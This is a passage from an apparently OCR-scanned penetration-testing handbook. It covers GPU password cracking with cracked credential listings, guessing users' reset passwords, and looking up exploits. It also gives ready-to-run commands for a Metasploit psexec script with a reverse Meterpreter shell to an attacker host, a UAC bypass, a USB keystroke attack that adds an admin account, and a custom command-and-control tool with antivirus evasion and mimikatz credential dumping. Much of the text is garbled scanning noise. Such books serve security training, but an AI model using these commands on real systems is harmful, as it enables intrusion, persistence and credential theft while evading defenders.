Stopped: Sun Jan 18 11:53:08 2015 





iC: Users \cheetz\Down loads \oc 1Назћсає-1 . 32 ос lHashcat64.exe -m 1000 has 
Prince - Password Cracking 


The hash output recovery went from 11790 to 11920 in 43 minutes. Although these aren’t significant 
gains, these could be the passwords that we really care about. One interesting note is that on a lot of 
different pentests, I have noticed that users who have extremely long passwords usually have higher 
privileges. Usually, someone in the IT or Security groups will with the most permissions. 


The last example is that we can actually pipe the results from Prince processor straight into 


oclHashcat. Let's look for words between 13 and 14 characters and run the InsidePro-HashManager 
rule against those words. 


ө princeprocessor-0.19\pp64.exe --pw-min=13 --pw-max=14 < 
lists\10k_and_scraped_passwords.txt | oclHashcat64.exe -m 1000 hashes hashes.lst -r 
rules\InsidePro-HashManager.rule —force 


Rules. Туре. : File CrulessInsidePro-HashHanager. rule? 
Input .lode.....: Pip 
Hash. Target. Т : File (hashes \haghes. let) 
Hash. iyi. TM ATLA 

Bait wee? Sun dan 18 12:02:29 2015 (42 mins, 10 secs) 
Speed. | "HUMUM A/S 
Dd. ‘GPU. 82...: 4987.3 Mes 


Speed. GPU.##,..: 112! Pi 
- і (56.085) Digests, 0/1 (0.08%) Salts 
: 30157428359168 
we 
THE 
‚+1 485 Util, 69с Temp, WA Fan 
iion C942: 7: 0; 1611, "Шс Тепр, N/A Fan 


Started: Sun dan 18 12:02:29 2015 
Stopped: Sun Jan 18 12:44:48 2015 


seta Down loads Noe Hasheat=1.32>princeprocessor-@.19\ppb4.exe --pu-nin*13 
idePro-HashManager.rule --force, 
Prince - Modifications 





After about 40 minutes, we have gone past the 56% rate. So in the total of 2 hours, we have cracked 
about 12,000 out of the 21,000 password hashes using all open source and readily available 
information. Taking it to the next step would be to focus on the targeted employees, pull additional 
password dumps, and lastly start brute forcing. 


C:\oclHashcat-1.32>.\hashcat-utils-1.1\morph.exe lists\crackstat_realhuman_phill.txt 20 3 3 12 > 
testrule.txt 


C:\oclHashcat-1.32>oclHashcat64.exe -m 1000 hashes\hashes.Ist lists\crackstat_realhuman_phill.txt - 
r testrule.txt --force 


pession.Nane...: oc lHashcat 
status NUTUS, Exhausted 
: File <testrule.txt) 
: File <lists\crackstat_realhuman_phill.txt> 
Hash. Target....: : File ¢hashes\hashes.Ist) 
Назћ.Туре......: : NILA 
ine .Started...: Моп Feb B2 21:07:17 2015 (5 sees) 
Time. Estimated.: Й secs 
speed.GPU.H#1...: 3839.3 МН 
epeed.GPl.#2...: 3769.6 M/s 
Speed. GPU. H*...: 7608.9 МН/$ 
© 12237/21318 (57.48%) Digests, 0/1 (0.00) Salts 
: 36156827385/36156827385 (100.007) 
‚1 6736156827385 (0.007) 
: „1 8736156827385 0.007) 
TOMAS TEM : Аи Util, 48с Temp, N/A Fan 
HWMon . GPU. 2.. с Bx Util, 49c Temp, N/A Fan 


Started: Mon Feb 82 21:87:17 2015 
stopped: Моп Feb O2 21:07:24 2015 


\Users\cheetz\Down loads‘\oc Hashcat-1.32>.\hashcat-utils-1.1\norph.exe 1 





:Ssers*cheetz*Dounloads*oclHashcat-1.32»o0clHashcat64.exe -n 1000 hashes 
Morph Example 


Now, we are going to go against the large crackstation password list. 


ө oclHashcat64.exe -m 1000 hashes\hashes.Ist 
\Users\cheetz\Desktop\Kali_Share\realuniq.|st -r rules\rockyou-30000.rule --force 


4Bd6d16794e8f 2dd5 787 71 F dc 87 hbsbe: 
ЬЬЕ1а6599'71а0714322872362с113есе: 


INFO: approaching final keyspace, workload adjusted 


session.Name...: ос1Назһсаї 

Status.......:.: Exhausted 

Rules.Type.....: File ireulessrockyou-3BBBB. rule? 

Input .Mode.....: Pile “NUsers\cheetz\Desktop\Hali_Share\realunig.lst> 
Hash.Target....: File Chasheshashes. lst) 

Hash. Type......: МПМ 

Time .otarted...: Моп Feb 02 23:19:59 2015 453 mins, ¢ 

Time .Estimated.: Й secs 

speed.GPU.#1...: И H/s 

Speed.GPl.#2...: 2366.3 kH/s 

Speed.GPu.#*...: 2366.3 КН 

Recovered......: 14275721318 (66.96%) Digests, Ai 0.007) Salts 
Progress.......: 35985380328888/359853880328888 (188.887) 
Sklpped........ : H/359853883ZBHHBB СИ. BH? 

He jected AEDEM UECLMET LU 

Hon. GPU.#1...: 16% Util, 67c Temp, M/A Fan 

HWMon.GPU.#2...: Ax Util, 70c Temp, N/A Fan 


Started: Mon Feb @2 23:19:55 2015 
Stopped: Tue Feb ЕНЕНЕ 


Ci\Users\cheetz\Down loads‘oc IHashcat-1.32»ocllashcat64.exe -m 1888 hazhes*ha 


oclHashcat - Results 


After about four hours of cracking, we are almost at 7096. This is just a start on how I approach 
password cracking. Usually, I will go after more custom passwords and try more complex rules to get 
to that 90%+. 


Retesting Passwords: What if after a test, they change all their passwords? What 1f we increment 
their old password by a value of 1? 


e oclHashcat64.exe -m 1000 hashes hashes.lst --show > password list.txt 

e type password list 

e test1:509019:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e 
e test3:498809:aad3b435b51404eeaad3b435b51404ee:523971d356ffcaaa96cfb6959 
e test4:496638:aad3b435b51404eeaad3b435b51404ee:4636190bde3bb52ad2d29ca3' 
e test5:520315:aad3b435b51404eeaad3b435b51404ee:b8ffa37b7c490aaf0e5661fad3 





There have been penetration tests where I compromised a domain and was successful in 
pulling/cracking hashes. The client patched all the findings, reset all the passwords of those users, 
and asked for a remediation test. 


After testing and validating that everything was fixed, I took it one step further. I wanted to make sure 
that the users didn’t just change their password by incrementing by one. We have seen a ton of 
password breaches and leaks in the past and we want to make sure that users are smarter than just 
incrementing by a single number. 


I have developed Password Plus One that takes the output from oclHashcat and regardless of special 
characters, increases the last integer by one. For example, if the passwords is 1<3turtles09, the new 
password generated is 1-3turtles10. 


If we take our last output and we read the hashes, it will look something like: 
root(Qkali:/opt/Password Plus One? cat /mnt/hgfs/oclHashcat-1.32/password list.txt 


e jsmith:1::64f12cddaa88057e06a81b54e73b949b::::Passwordl 

e plee:2::f9671733342b1 9ec0753bd34892cc4c3::::Nina2014 

e ssmith:3::176b4c6fbb0a54cd5a693b57fe887465S::::1<3turtles09 

e jwatts:5::9f00b7969b887b7e2 1a736c09328d083::::TodayisToday 
e bjones:6::d3b4e97bb637cd629ef5b9f5d7bd5064::::Toneth2$ 


We want to run password plus one on our large password list: 


e cd /opt/Password Plus One 

e python ./password plus one.py 
o Enter the location of the oclHashcat output 
o A new file will be created with a list of Usernames/New Passwords 
to new password list.txt 


# python password plus one 


t manipulation. 


generated fron cat and increments the 


ies \hast 


P+1 - Password Modification 





Now, you can feed this into a bruteforcer for web applications, SSH, or even Outlook Web 
Application (OWA). On decent sized clients, this attack usually leads back into multiple accounts and 
into the company. 


Vulnerability Searching 


A huge part about being a pentester is being able to find vulnerabilities in applications and services. 
From the Nmap scans, vulnerability scans, and from poking around, you will identify all sorts of 
versions for these applications and services. 


Generally, I will take the results from Nmap banners and the vulnerability scanner and query the 
identified versions of the applications against the following sites/tools to find exploits: 


Searchsploit (Kali Linux) 


Searchsploit is a default query tool that will search through publicly known exploits based on a 
search string you provide. You can provide part of the title or application to find an exploit. There 
are a good number of exploits here and most of them have code or scripts ready to run. One thing I 
want to strongly urge is to make sure that you test them in a lab environment before testing them on 
production systems. 


On your Kali host, run searchsploit. 





Searchsploit 


For this example, let's say I found a Joomla site and I want to see if there are any vulnerabilities for 
this application. To query searchsploit, I will craft a query like: 
searchsploit joomla. 


Joomla Kunena Component (index.php php/webapps/22153.pl 


Joomla Spider Catalog (index .ph 1р php/webapps/22403.t xt 
Joomla JooProperty 1.13.0 Multiple Vulnerabilities php/webapps/ 73286. 
Joomla Spider Calendar (index.php php prea 23/82.t) 
Joomla com collector Component Arbitrary File Upload /php/webapr 24228, 


Joomla! <= 3.0.2 (highlight.php) PHP Object Injection feta ART 


Joomla RSfiles Component (cid param) - SQL Injection 'php/webap éj” 24851. у 
CiviCRM for Joomla 4,2,2 - Remote Code Injection phip/ webapps, 
Joon | a TERE rapean, php) РНР Object Injection /php/w е0арре/ 
Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection /php/web. 
T Clan Roster c com sot Дапговїег [index.php | D/Wébar ps 





* а (0) 
Searchsploit Results 





Just from a quick query for Joomla, we currently have 906 different vulnerabilities. Let's take a look 
at one of them to get an idea of what it looks like. One thing to note is that the paths in the results are 


pathed improperly. All searchsploit files are located under /usr/share/exploitdb/. To view the 
vulnerability or exploit code, type the following: 
cat /usr/share/exploitdb/platforms/php/webapps/22153.pl 


| ( om k unena SQ 


)?optionscom kunena& 


-omkunena2 .png 


: http: WW. } 
to Taurusomar 


CEE EEE EEE EEE EEE EEE EEE EEE EEE EEE EEE КЕЕ ЕЕ ЕЕ aTe 
Joomla Component com_kunena SQL Injection *\n"; 
Coded by D35m0nd142 к\п"; 


*+*+++++*+*++++ ++ +++ ++ +, +++ ++ {+++ + +++ ++ +++ EEE EES п": 
' " 


tendo 19" 





22153 Perl Joomla Exploit Example 


The 22153.pl is a Perl script to perform an SQL injection against a certain version of Joomla. If 
successful, the Perl script will return the password of the administrator. 


Bugtraq 


(http://www.securityfocus.com/bid) 


Security Focus’s BugTraq is an excellent source for finding vulnerabilities and exploits. You can 
search vulnerabilities by CVEs or by vendor/product types at: http://www.securityfocus.com/bid. 


In the example below, I was looking for some Adobe ColdFusion exploits and seemed to have found 
quite a few. 


www.securityfocus.com/bid 


Symantec Connect 


A technical community for Symantec customers, end-users, developers, and partners 














Vulnerabilities 

Vendor: Adobe +.) 
Title: ColdFusion А 

Version: Select Version + 

Search by CVE 

CVE: 


Adobe ColdFusion CVE-2010-5290 Authentication Bypass Vulnerability 
2013-09-20 
http://www.securityfocus.com/bid/62695 


Adobe ColdFusion CVE-2013-0632 Authentication Bypass Vulnerability 
2013-08-20 
http://www.securityfocus.com/bid/57330 


Adobe ColdFusion CVE-2013-3349 Remote Denial of Service Vulnerability 
2013-07-09 





BugTraq 


Exploit-db 
(http://www.exploit-db.com/) 


This site has definitely grown and I really see this site as the replacement of the good ol' milwOrm. 
Many researches will post their exploits and research to Exploit-DB, which is completely 
searchable. I recommend that you spend some time on Exploit-DB as it is a great resource. 


4. S 4% exploit -db.com , + At Der по. - ці 


© озые + Д Cookies » ZF CSS + @ Forms + aD images + f information + @ Miscelaneos: , I Outline > J Resize + Р Toos * <> View Source ~ jij 


Remote Exploits 
Date о А y Description 
2013-10-10 $ 
2013-10-10 $ 
2013-1046 $ 
2013-1006 $ 
2013-1004 $ 
2013104 & . s 
"PORT Иа 
Local Exploits 
Date ^ Li Description 
2013-10-08 [a 
2013-10-04 
2013-10-02 


2013-09-30 
2013-09-24 


D 
, 
a 
Li 
20130-0 8 
^ 
5 
Li 


2013-99-17 


Web Applications 
Date D A ү Description 

2013-10-10 

2013-10-08 

1013-10-08 

2013-10-04 

2013-10-04 

2013-10-04 

2012-10-04 





Exploit-DB 


Querying Metasploit 


You can't forget Metasploit as a great resource for finding vulnerabilities. 
e On your Kali host, in a terminal type: msfconsole 
e And to find an exploit or auxiliary module, type: search [what you want to find] 


In the following example, I search for all ColdFusion modules. 





Search Metasploit 


Tips and Tricks 


This section is dedicated to things that didn't really have a place in the other sections, but might be 
able to make your job much easier. 


RC Scripts Within Metasploit 


Since I try to encourage efficiency, some scripts that you should look into are Metasploit's resource 
(RC) scripts. These scripts can be created to help speed up common tasks you might perform. For this 
example, I am creating a script to use the PSExec module, use smart migrate to migrate the 
Meterpreter process into another PID, and set all the fill-in other information required for the attack. 


We will save the following code to demo.rc: 
e use exploit/windows/smb/psexec 
e set rhost 192.168.10.10 
e set smbuser Administrator 
e set smbpass hash or password 
e set smbdomain domain 
e set payload windows/meterpreter/reverse tcp 
e set AutoRunScript post/windows/manage/smart migrate 
e setg lport 443 
e setg lhost 192.168.10.3 





To run the script, from a shell prompt enter: 
e msfconsole -r /root/demo.rc 





RC Scripts 


All you have to do after it loads is type: exploit. This script starts up Metasploit, authenticates to 
192.168.10.10 using PSExec, drops and executes the Meterpreter payload, and connects that box back 
to your host to gain a full Meterpreter shell. 


This is a much faster way to prepare your scripts, exploits, and especially handlers. I like to add 
features like auto-migrate or add custom payloads to exploits. 


Windows Sniffer 


There might be times where you might need to start a sniffer on the host system. This can be done on 
any Win7 or higher OS with Administrative Privileges, without any additional software. {47} {48} 


e netsh trace start capture=yes overwrite=no tracefile-C:NUsers Public sniff.etl 
e netsh trace stop 


To convert the etl file to something we can view in Wireshark (.cap file), we have to do the 
following: 


e On Win 8, first install Message Analyzer: 
O 

e Run the command: 
o powershell -exec bypass command "import-module PEF; $s = New- 
PefTraceSession -Path 'C:\Users\Public\OutFile.Cap' -SaveOnStop; $s 


| Add-PefMessageProvider -Provider 'C:\Users\Public\sniff.etl' ; $s | 
Start-PefTraceSession" 


The output will be located in C:\Users\Public\OutFile.Cap, where you can just open this file in 
WireShark. Remember that by default, it only captures 250MB, so if you need more space, specify the 
MaxSize=<Size> switch. 


So, what do you do after you capture a lot of different network traffic? You need to parse through it. 
We are going to use a tool called net-creds developed by Dan McInerney. Net-creds is a tool that 
sniffs passwords and hashes from a pcap file. It will include URLs, username/passwords in cleartext, 
SNMP, SMTP, NTLM, and Kerberos. Since this tool only takes in pcap files, it is important to first 
convert your cap file to a pcap file. I usually do this by loading the cap file into Wireshark and saving 
it back as a pcap. Once we have a pcap file, we can run the following commands: 

e cd /opt/net-creds 

e python net-creds.py -p [pcap file] 


root@kali:/opt/net-creds# python net-creds.py -p OutFile.pcap 

[192.168.1.85] GET next-services.apps.microsoft.com/ 

[192.168.1.85:49764 > 192.168.210.76:21] FTP User: hacker 

[192.168.1.85:49764 > 192.168.210.76:21] FTP Pass: password 

[192.168.210.76:21 > 192.168.1.85:49764] Authentication: authentication successful 
[192.168.1.85:51234 > 192.168.210.76:445] NETNTLMv2: lab::hacker.testlab: 11223344... 


Bypass UAC 


There are times when you might have an administrative account and a Meterpreter session, but you 
can't become system by using the "getsystem" command. This is most likely because User Account 
Control (UAC) protection 1s blocking you from running the getsystem command. 


In the past and in the previous book, we used either a custom upload of bypassUAC from David 
Kennedy or used the metasploit module bypassuac. The issue was that it had to drop an executable, 
which would generally spawn a second file as well. I have often seen instances where AV would 
pick up either one of the two files. 


To get around this, I migrated from using bypassuac to using bypassusac injection. This module uses 
the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three 
separate binaries in the standard technique. The reason I switched is because I have had better luck 
evading AV using DLL versus executables. If you need to use a custom DLL, you can always set 
EXE::Custom to your DLL. Let's walk through an example where you need to get to system quick. 


You might see something like this: 


ө msf exploit(bypassuac injection) > sessions -i 1 

e [*] Starting interaction with 1... 

ө meterpreter > getsystem 

e [-] priv elevate getsystem: Operation failed: The environment is incorrect. 


If you do have an administrative account, most likely UAC is blocking execution, which is enabled by 
default. To get around this, you will need to background the current Meterpreter process, use the 
bypassuac_injection module, set your options, and run it: 

e meterpreter > background 

ө [*] Backgrounding session 1... 

e msfexploit(bypassuac injection) > use exploit/windows/local/bypassuac injection 

e msf exploit(bypassuac injection) > set target 1 

e target => | 

ө msf exploit(bypassuac injection) > set PAYLOAD 

windows/x64/meterpreter/reverse_https 

e PAYLOAD => windows/x64/meterpreter/reverse_https 

e msf exploit(bypassuac_injection) > exploit 


Note that if you are targeting a x64 host, you need to make sure to set the PAYLOAD to a 64bit 
payload and set the target to “1” which is a Windows 64bit OS. 


E 


-msf exploit 


Started HTTPS r 
с is Enabled, 


for target /EwSm received 
573151714178473 -57172 1167151 .202}5: 


Unknown command: session. 
Е c oit( [os 
| Starting interaction with 2... 





BypassUAC 


Now, you can do hashdumps, mimikatz, or any other command that requires system privileges. 


Kali Linux Nethunter 


Every so often, I need to do a little penetration testing on the go. A great portable solution for this is 
Kali Linux NetHunter. 


“The Kali Linux NetHunter project is the first Open Source Android penetration testing platform for 
Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and 
Offensive Security. NetHunter supports Wireless 802.11 frame injection, one-click MANA Evil 
Access Point setups, HID keyboard (Teensy-like attacks), as well as BadUSB MITM attacks.” {49} 


Out of the box, NetHunter works pretty easily with Nexus 5, Nexus 7, or Nexus 10. To install, 
download the NetHunter Installer from: 


https://www.offensive-security.com/kali-linux-nethunter-download/, 


Run the executable, and follow the install instructions. 





r 
X NetHunter Installer v1.1.6 by Offensive Security 







Step #1 - Device Selection: 
Select the device you have: 
| Nexus 7 2013 Edition (Wi-Fi Tablet) М 
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n NetHunter Installer v1.1.6 by Offensive Security 
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Step #4 - Download Files: 


File Download Status: 

Kali Linux NetHunter: Not Present - Need to download. 
Modified Bootimg: Not Present - Need to download. 
TWRP Recovery: Not Present - Need to download. 
Chainfire SuperSU: Ready! - SuperSU-v2.40.zip 
Factory Package: Not Present - Need to download. 








NetHunter.com lex | Exit | 


Installing NetHunter 


Installation is pretty straightforward and once you have it all configured, NetHunter is ready to go. 
Going to the tablet, you will be brought to the screen below. To start using NetHunter, drop into the 
NetHunter App. 


WIDGETS Е © Kali Launcher 


Launch Kali Shell in Terminal 


Launch Kali Menu in Terminal 


a 


Peopl 


Launch Wifite 


r 


3 


Update Kali chroot 


© 





Nethunter Start Screen 


If we drop into the “Launch Kali Shell in Terminal” we can type “msfconsole” and drop straight into 
Metasploit. NetHunter has a lot of abilities, such as attacking WIFI networks, setting up access points, 
malicious DNS servers, and more. 


| E 


Е Window 7 


ramewc 


3Kom SuperHack II Logon 






loit 





Nethunter - Metasp 


One of the attacks is similar to the Rubber Ducky attack. This attack is called the “HID Keyboard 
Attack" and allows the Nexus device to emulate a keyboard and press keystrokes onto the machine 
once it is plugged into a computer. To access the HID tool, on the top-left menu, we can drop to *HID 
Keyboard Attack." 


5E Tx 7 БЕ КЕ @O 


С“. NetHunter Android = € HID Keyboard Attack 


NetHunter Home erSplc Windows CMD UAC Bypass 


ит 
eyt Keyboard Layout 


Kali Service Control ау: Execute Attack 
*ipconfig 

HID Keyboard Attack net user offsec H1dKey80ard! /add Reset USB 
net localgroup administrators offsec /add 


BadUSB MITM Attack 


MANA Evil Access Point 
Update 


Dnsmasgq Service 


Iptables Configuration 





Nethunter HID Attack 


You might have to configure the UAC Bypass and once the device is plugged into a computer, just hit 


execute. The great part about this tool is that it is flexible, easy to configure, and quick to use. You 
might be on a physical engagement, where you are walking around the office. You see someone leave 
their workstation unlocked to leave for lunch. You don’t want to be sitting there typing commands on 
their machine. Instead, you might be able to plug your NetHunter device into a USB port and hit 
execute. You wait as it calls a PowerShell Meterpreter script and creates a reverse shell. Another use 
for something like the HID Keyboard Attack is with kiosks. I have seen plenty of kiosks that either 
have a limited physical/virtual keyboard, or no keyboard at all, but have USB ports. This is a great 
attack for just that. 


Building A Custom Reverse Shell 


I did a presentation at one of the LETHAL meetings about problems we sometimes encounter on 
engagements. As we run into more and more complex firewalls, we need to look at things differently. 
One thing I started seeing is application-based firewalls. The idea behind this is that the firewall 
looks at the packets to see if they are communicating the proper protocols on the proper ports. So, you 
can’t run SSH on web ports (80/443) and the company does full “тап in the middle” SSL proxying. 
Therefore, not only do we need to look like the protocols that are specific on ports, but we also need 
to evade any sort of IDS. When I teach, I love to give the doomsday scenario. Let’s say Metasploit no 
longer works, you have full SSL interception, and IDS work great. What can you do? 


I started building a framework exactly for this. What were my requirements? 
e Bypass application-based firewalls 
ө Make everything seem normal to an analyst 
e Be able to have full control of the host 
e Be able to upload/download files 
e Make penetration testing faster 
e Generate client executables and evade AV 


I built and implemented the communication protocol first. From there, I can build all the modules. The 
implementation targeted the following: 
e Take the Top 500 Words 
e Any C2 communication between client and server 
o Get gzip for compression 
o Get base64 encoded for standard characters 
o Each letter is converted to a word 
e Make sure traffic looks random 
o The same cmd command doesn't look the same (cmd != cmd) 
o Can't build standard IDS signatures 
e Utilize system commands (PowerShell, WMI) 
e Python/pyinstaller 


Let's walk through an example. Let's say we want to send a “cmd ipconfig” command to get the IP of 


the host: 


| cmd ipconfig | 11 ie (no change 
Gzip Compress Result: х\ х9сК. \хсеМО \хс8,Н\хсе AXCÉK \xcbL\ x07 \ 
cmd ipcontig | OO\x1d_\x04\xa4d 


Base64 Encode Result: 

X x9cK xceMQ \хс8,Н\хсе VxcfK xcbL x07 
_х00\х1а_\х04\ха4 

Random Key Generation (1-500) 
Now that we have a base64 encoded string (eJxLzk1 RyCxIzs9LyOwHABI| fBKQ) and a key of 20, we 
can generate obfuscated packets: 





Take Key (20) Against Top 500 Words and Uppercase 

First Letter 

First Letter from Base64 Current Counter = 20 (key) +5 (eis 
(ејхі = КІКуСхІ2591 yOw HABIEBKQ) and add to Key the 5th letter of the alphabet) 

Value Current Counter = 25 

Find the 25th word in Top 500 Words list 

Continue for every letter in the Base64 string 





Server Implementation: 


The other requirement was to bypass application based firewalls. To do this, we need to not only 
communicate over a web port, but we need it to look like web traffic. 


Request: POST Hello Request | Response: dog cat woof... | Victim sends Hello and Server 
responds with run ipconfig 


Processes to ipcontig Response: (Empty) Victim processes ipconfig and sends 
Sends POST: Where am foreve server nothing back 
tomorrow... 


Request: POST Hello Request Victim keeps sending Hello pings 
until command is given 





Now that we have an understanding of how the clients will communicate to our server, let’s walk 
through the Proof of Concept (PoC). First install the c2 code and create a malicious binary. *Make 
sure to have SMBExec and Veil-Framework installed. These tools will install all the dependencies. 


e git clone https://github.com/cheetz/c2 /opt/c2/ 
ө cd /opt/c2/ 

e chmod +x setup.sh 

e /setup.sh 

e python ./server.py 

e help 

e generate binary [ip] [port] 





> help 


WeLcane L 5 sovert ane 

Command Summary: 

sessions list all Sessions 
info [host] print info about a s 


cmd [host] kill kill specific sessio 
pwn pwn host and return 

sleep [command] change the sleep cor 
post [host] [command] post exploitation co 
generate binary [ip] [port] create client binar 

exit 

> generate binary 172.16.151,128 80 

err:winediag:SECUR32 | initNTLMSg nlm [ашїһ was not found or is outdat 
h. Usually, you can find it ig the winbind patkage of your distribut 
69 INFO: wrote Z:\opt\c2\winword\spac 

90 INFO: Testing for ability fo set [1сой5, Wersidn resources... 

181 INFO: ... resource update! availabla В | 

108 INFO: UPX is not available. . 

> 990 INFO: checking Analysis 

990 INFO: building Analysis because out@0-Amalysis.toc пой existent 

990 INFO: running Analysis out@@-Analysis.toc 

996 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final 


Custom C2 - Building a Payload 





We have generated a binary and it is saved to /opt/c2/dist/winword.exe. This is a python file turned 
into an executable that will communicate back to our server. We can now take that executable and 
move it to our victim system and run it. 


Once a victim has executed the client, you will see the hostname show up on the C2 server. We can 
run a quick help to see what we can do. One example is the info [host] command. If we run info win7, 
we see the all the host information, such as user and system info, permissions, network information, 
netstat, and open shares. 


4467 INFO: Appending archive to EXE 2 :Noptic2Xdistywinword.exe 
> win/:Connectedv2 win 
> help 


Command Summary: 


1151 all sessions 
print info about 
kill specific ses 
pwn host and retu 
[command] change the sleep 
post [host] [command] post exploitation 
generate binary [ip] [port] create client bin 
exit 
» info win/ 
> win/:USER INFORMATION 


User Name SD 


eee cee ————— == == 
————————————— === 


hacker\testuserl 5-1-5 -21 - 3525058729 -1821581466 -2040179600 - 1106 


GROUP INFORMATION 


Well-known group 5-1-1-0 
nabled by default, Enabled group 
BUILTIN\Users Alias 5-1-5-32- 
nabled by default, Enabled group 








Custom C2 - Post Exploitation 





I also incorporated a ton of the standard post execution commands. Although Metasploit and 
Meterpreter are amazing tools, sometimes it is hard to know exactly what to do next. That is why I 
created the post section specifically for Windows. It will do all the standard Windows Post 
exploitation, such as list patches, list users, list all AD accounts in active directory, pull passwords 
with Mimikatz, bypassUAC, and popcreds. Just type “post” on the server and interact with: 

e post win7 password64 

e This will execute mimikatz on the end host and pull hashes. 


> win’ :Connectedv2 win? 
> post 


Command Summary: 
cmd [host] [command] command to.rün on host 
post [host] ad users pull all adusers and info from AD 
post [host] password if the executable was run as admir 
post [host] password64 if the executable was run as admi 
stems 
post [host] get_computer details get all computer details 
post [host] netview finds all machines on the Local do 
s a long time 
[host] win patches List all windows hotfixes 
[host] 1151 processes detailed list information on runni 
[host] 1151 иѕегѕ detailed list information on users 
[host] downloadfile [file] [Location] send a file. location is 
[host] bypassuac32 bypass UAC for 32bit 05 
[host] bypassuac bypass UAC for Bábit OS 
[host] pop creds pop up à username/password box to 
hast calc calc calc calc 
> post win/ password64 
> Win’: FARE. mimikatz 2.0 alpha (x64) release "Кімі en C" (Мау 20 2014 08:56:4 
#8 ° #8. 
я / \ HF уе 
HX / ## Benjamin DELPY  gentilkiwi ( benjamin@gentilkiwi.com ) 
‘ee v FF OWttp://blog.gentlykilwi.dom/mimikatz (oeieo) 
' HHHH With 14 madules * $ A 


mimikatz(powershell) # sekurl$a: : logonpsasswornds 


Authentication Id : 0 ; 305524 (00000000; 00043974) 
SE Interactive-Trom! 
‚ testuserl 
: HACKER 
‚ §-1-5-21 -3525058729 - 1821581466 -2046179606-1106 


[00000003] Primary 
* Username : testuserl 
* Domain : HACKER 
* NTLM : 0a3a3d8c4a8796249356e09488de5ebbe 
‚ Slfd3daGe2456fbld31663b9385e881e/05a561¢ 


Custom C2 - BypassUAC and Mimikatz 





You also have the ability to run commands on the end host with cmd [hostname] “command”. More 


importantly than running these commands is: “What does the traffic look like?” Next, let’s look in 
Wireshark to view the TCP stream when we pull hashes in the next example. 


Filter; btp.stream eq 55 “инш. Шек бе 
1958 295. 5542070 172.16.151. 202 172.16. 751. 128 ТР B) 53506 » http [ACK] баш51Я Ackeg7S Winz4758 Lane 
1059 295.554475/X 172.16.151.202 172.186.151. 128 ТФ BD 53506 » http [FIN, АСК] Seqesl8 Асад Winsb476H L 
1951 205. 55240156 172, 16.15), 202 172.18. 15]. Lil Тф 64 55606 = http [SYN] Saget апай 02 Lanet М05=1460 Wi 
1952 28.5540 172,186, 191, 128 172,16, 191,202 T бв http > 53506 [SYh, ACK) бадей Аска] winzzSeoo Lenet 


1956 295, 3530000 172,16.151, L28 
1954 295.5528140 172.186.151. 202 


Fallow TCP Stream 





Stream Content 

| post ИТЕ 
Prat 1857; 950 bytes on wire [7680 b Accept-Encoding: identity 
Ethernet II, Sre: Ware dí:dl:bg [po Céntent-Le thi 16 


ee 8-15 й: 20 
Internet Protocol Version 4, бес: 172 piz 









ути app LL ea toon nel gad 8, ys qed d 
inda NT 8.1: WOwdd: Fy) Gecko 2010010]. Буре! / 02,0 


a ү sin ade 
ч Contant- Тура: applicationi- ww fare ur Leneedad 
on e 26 hà t FR 00 (e. 26 di 4] 
i 





маці атн opere eps mápiperdontgavarm eer Tal тарауга gar veecer tain cantar atari 
qornecartuum money vroaded аена ерен Late ань ЫНА Динле! [аата ath 
JOTTEL g 200 (К 
Frome (960 byte) Гаете TCP [82 bn и var 
bate: Sun, 15 Fab 2015 00:49:40 (ИТ 
cant ant Aj pu: тш 





oF File: “/tmp/witesharkpeapngethi)..: Pac 

* Wi MELDEN [mius een anger should grow heusa hand high animal grow end follow animal high port 
light ebuntry picture mn act world land found try stand naar Са Ру ип sien mathar 
sun gantry ahauld grow put us Ben mother add earth paint and high ahg uld such аа 
NE sull off g üuntry found cover sun never near kind ca untry gra pictura fellow чё 

} peint bag scheal animal {һу try learn ng ar try Ф si | 
keep hom chan yu father hara must aff grow mer А 
Teed Light build part add answer add naad point point sun е d fellow eya earth 
page earth point earth near act pl lant tha ught ath uly us act һе aet eye maar us lat 









Entire conversation (1440 bytes) 





Custom C2 - TCP Stream Using Words 


As you can see, the client sent what looks to be a very badly constructed sentence and the response 
from the nginx C2 server (not really nginx but python) is a long run-on mix of words. Whether you are 
sending your victim’s files or commands, they will all follow the same structure. 


Think about this for a second: If you are monitoring the network or configuring an IDS, how do you 
detect this type of traffic? Unless you are reading line by line, the traffic looks just like normal web 
traffic. There are no patterns or special characters, and the sentences actually look like sentences (but 
don’t make sense of course). You could be on this host all day long and never be detected. This is just 
a PoC, which was developed for a specific penetration test. I recommend you take the code and 
expand on it or build your own. 


Evading Application Based Firewalls 


We are seeing more and more UTM based firewalls that perform Application Level Filtering. 
Meaning, if you aren’t the right protocol for the defined port, you are going to be denied, which will 
trigger the alert. 


Building a communication tunnel yourself would be a great exercise for any pentester. Luckily, David 
Kennedy has already done the work for you.(50)(51) I forked a copy from David’s Github; however, I 
did have to make one change. On line 108, I commented out the “break” in his code. 


Installation and configuration: 
e git clone https://github.com/cheetz/meterssh /opt/meterssh 
e cd /opt/meterssh 
e gedit meterssh.py 
e At the bottom modify the following: 
e user — "sshuser" 
e password = "sshpw" 
e rhost — "192.168.1.1" 
e port — "22" 


Make sure Veil-Evasion is installed as it takes care of many of the dependencies. It takes a little work 
to get everything configured since we need to start the SSH service and install some dependencies: 
e service ssh start 
e git clone https://github.com/warner/python-ecdsa.git /opt/python-ecdsa 
e cd /opt/python-ecdsa/ && wine C:/Python27/python.exe ./setup.py install 
e git clone https://github.com/paramiko/paramiko.git /opt/paramiko 
e cd /opt/paramiko/ && wine C:/Python27/python.exe ./setup.py install 
e git clone https://github.com/pyinstaller/pyinstaller.git /opt/pyinstaller 
e cd /opt/pyinstaller/ && wine C:/Python27/python.exe /opt/pyinstaller/setup.py 
install 
e cd /opt/ && wget https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller- 
2.1.zip#md5=3eb18a454311707ab7808d881e677329 && unzip PylInstaller-2.1.zip 
e cd /opt/meterssh/ 
e wine C:/Python27/python.exe /opt/Pyinstaller-2.1/pyinstaller.py --noconsole -- 
onefile meterssh.py 


After it successfully completes, you should have a new Windows Executable located at 
/opt/meterssh/dist/meterssh.exe. Copy this file to your victim host and start the meterssh.exe. 


e cd /opt/meterssh/ && python ./monitor.py 
e Execute the executable on a victim host 


1312 LNFU: checking 

13/4 INFO: checking 

1420 INFO: checking PK 

1421 INFO: building becau: :\opt \meterssh\build\meterssh\meterssh.e 

changed 

